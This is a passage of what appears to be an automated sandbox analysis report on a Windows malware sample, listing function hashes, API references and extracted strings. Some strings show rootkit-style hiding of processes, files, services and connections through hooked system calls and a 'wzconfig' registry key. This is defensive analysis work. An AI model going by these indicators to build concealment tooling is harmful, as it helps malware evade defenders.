                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 310d726cad5d3585bf1d3cf655f94a01babb62eaa47949ee68aac46df03e5dd7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7115E36710F058AEB40CF64E8583A837A8F319758F080E21DE6D427A4DF38D5B88340
                                                                                                                                                                                                                                                Function 000002616F301F40 Relevance: 4.0, Strings: 3, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 0-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: 44cbf86cdc0ddbb44743e8f5efb7c152779ff0e7835dd09ecf58b37d28ca2a1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60B1047A2106918AFB98CF65D6487A973AEFB44B84F4C5017EE0993794DF36ECA0C341
                                                                                                                                                                                                                                                Function 000002616F5A4A18 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                                • Opcode ID: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction ID: 0c643126ef90a50c0fbea1f888c1e9cfba54b1da6a39323953eed5580286a35d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B11977200B888EEB15CF69C88A3587BA5F384B48F19C916DE5D877B5CB3AD865C700
                                                                                                                                                                                                                                                Function 000002616F313E18 Relevance: 1.7, APIs: 1, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _clrfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3618594692-0
                                                                                                                                                                                                                                                • Opcode ID: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction ID: 343dd5d2dd543ea25d4432f443ed1ef84fb97e5bf9ac6dd0a3141e126250b7c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f266c12a220961406dde8eee325c1bf83c1065a404d0d9410b684e73e4a061
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B13B77200B888FEB15CF2AC88A3587BB5F384B49F198915DB5D877A4CB3AD461C701
                                                                                                                                                                                                                                                Function 000002616F59E250 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction ID: f45e88764e900034d2a2ee5898fa90e80993220f958839af29c79cd3f696bff8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8651D5367007D08AFB249B72E94879E7BAAF7457D4F188114EE5827B99DB39D821C700
                                                                                                                                                                                                                                                Function 000002616F5A6100 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                                • API String ID: 0-2002025803
                                                                                                                                                                                                                                                • Opcode ID: f6aacf51cb33b707cb24cd9af6edfcd30ca69ce813e0594cda8c625fc8c82466
                                                                                                                                                                                                                                                • Instruction ID: ceaf2ceaa79762217117b7e58b6695b83b800717c22ee00206f55368735bae83
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6aacf51cb33b707cb24cd9af6edfcd30ca69ce813e0594cda8c625fc8c82466
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA31DEFF54DBC40EF3938A7CC87A25A2FDAA793E00F4ED056DA8006187E5572C3A8641
                                                                                                                                                                                                                                                Function 000002616F59FDA0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                • Opcode ID: 24f512c07acdf0e634261ab2d45bfa525d446d731f5c54d71af1c68651d24f8d
                                                                                                                                                                                                                                                • Instruction ID: abdb34cb354ff96d8d4250f7692f5dc49dffca064a0cdb60cfe1eaff2b17b0cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24f512c07acdf0e634261ab2d45bfa525d446d731f5c54d71af1c68651d24f8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DB0923CA13B09CAEA0A2B15EC8A30422AABB48701F998018840C41320DA2D28BA5B10
                                                                                                                                                                                                                                                Function 000002616F30D650 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction ID: a9fb9487e9124b5339b4971993124eccb23c8df1cffe08adb9e71cb46f02edba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B51C23670079089FB20DB76E84879E7BEBB744BD4F184116EE5827B99DE39D421C701
                                                                                                                                                                                                                                                Function 000002616F5A6218 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 307302fee793cb47842d0b36a6f453d22f5a353d42adcd47c207e399357ec3df
                                                                                                                                                                                                                                                • Instruction ID: a5f12a0cbf99ecdc342060e23aae48439670c0b88216c137c755b42e3e386f85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 307302fee793cb47842d0b36a6f453d22f5a353d42adcd47c207e399357ec3df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8331B3FF54DBC54EF3934A7C896E6493F96ABA3E04B0EC056CB80421CBE6572C398651
                                                                                                                                                                                                                                                Function 000002616F313C60 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d120009e22b2c10b69ee1c7cf997a6593d570e53da93b21d446b083ea9a632e3
                                                                                                                                                                                                                                                • Instruction ID: 3f7575a97a60d055d46930a303f8ea74947eb859395f3bc81c78d6db3ca14e97
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d120009e22b2c10b69ee1c7cf997a6593d570e53da93b21d446b083ea9a632e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31F062757242948EEBA8CF28E943B1977E5F348780F848419DA89C3B04D23DD070CF05
                                                                                                                                                                                                                                                Function 000002616F591630 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                                                                • API String ID: 106492572-440640706
                                                                                                                                                                                                                                                • Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction ID: 7995adddaed06be458973292db16e5af529c7160ceea08ac4839d996df2b57d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B71423A310B508AEB10AF76E84869D376EF746B88F099111DD4E47B59EF36D878C340
                                                                                                                                                                                                                                                Function 000002616F5912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: 2dacda006e7eab409b77a1f78b26c79b6361b35e4d923956b73df3c972c0162a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA51943A200B848AEB55CF66E54C35A77AAF78AFC5F088124DE4907718DF3DD469C700
                                                                                                                                                                                                                                                Function 000002616F591D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: 20017e8feb68f2d950095fdd9f5197d0408cebef469e4c44c75bd6255b6ab6a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF31CD7C100A8EACEA09EB55E8597D4632FA745344F8CD413981906172DF7AEE7EC7A0
                                                                                                                                                                                                                                                Function 000002616F59D398 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 000002616F59D3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 000002616F59D447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000002616F59F23C,?,?,?,?,000002616F59C50F,?,?,?,?,?,000002616F597AC0), ref: 000002616F59D49C
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F59DC3C: HeapAlloc.KERNEL32 ref: 000002616F59DC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D4C4
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F59DCB4: HeapFree.KERNEL32 ref: 000002616F59DCCA
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F59DCB4: GetLastError.KERNEL32 ref: 000002616F59DCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: e6be4582c1c7790624e7c790105313243c0dfeea310f1895f65e08188ece6160
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5641613C2006C88AF95CA725D56D36D628F5B467B0F1CC724AC7A076D7DE6ABC318600
                                                                                                                                                                                                                                                Function 000002616F59224C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: 1d44cde51dde2499cbd793102e51572d8d9aeb8e5208efdf455d5e1c063bce11
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA21C53A21474087F710CB25F40835A77A6F786BA4F448215DE5903BA8CF7DD9A9CF00
                                                                                                                                                                                                                                                Function 000002616F309EF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 78c2e5b8e6cb2378f83bc25efeea12599041ee685a56b68c92ee8849f6735847
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCD1C37A604B408EEF60DF65E48839D77AAF745788F080117EF8957B99CB36E4A0C706
                                                                                                                                                                                                                                                Function 000002616F59AAF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 5ea085c38808bfdd1a88708ae1e88ade133760eb174250ac5f06833ed16194e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37D1147AA007C08EEB68DF24D44839D37BAF746788F088105EE8957B86CF35E8A0C750
                                                                                                                                                                                                                                                Function 000002616F59F904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: d95c9582e578627c791a07792509256fb14a9ef44ed8d4376c2844f17db374da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA41E33A311B805EFA5ACB26E80C79527DBB746BE0F4DD125AD0957784EB3AEC658300
                                                                                                                                                                                                                                                Function 000002616F59104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
